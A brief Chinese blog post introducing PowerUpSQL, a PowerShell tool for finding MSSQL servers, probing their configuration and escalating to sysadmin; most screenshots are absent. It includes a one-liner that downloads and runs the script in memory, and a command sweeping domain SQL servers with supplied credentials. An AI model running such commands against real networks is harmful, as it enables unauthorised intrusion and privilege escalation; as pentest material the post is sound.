PowerUpSQL工具的使用

华盟原创文章投稿奖励计划

PowerUpSQL工具的使用 

PowerUpSQL是一款基于Powershell的,针对MSSQL数据库的利用工具
功能

数据库发现,探测本机及内网/同域的MSSQL数据
数据库安全配置探测
尝试使用确定的漏洞获取系统管理员权限
加载PowerUpSQL

IEX(New-Object System.Net.WebClient).DownloadString("https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1")
发现本地MSSQL
PowerUpSQL工具的使用 
获取配置信息
PowerUpSQL工具的使用 
获取服务信息
PowerUpSQL工具的使用 
查看登录信息
PowerUpSQL工具的使用 
获取可以使用提供的SQL Server登录登录的域SQL服务器列表

$Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 -username testuser -password testpass | Where-Object {$_.Status -like "Accessible"}
$Targets
SQL Server权限升级

PowerUpSQL工具的使用 
工具挺强大的,大家自己研究吧

本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/243324.html

发表评论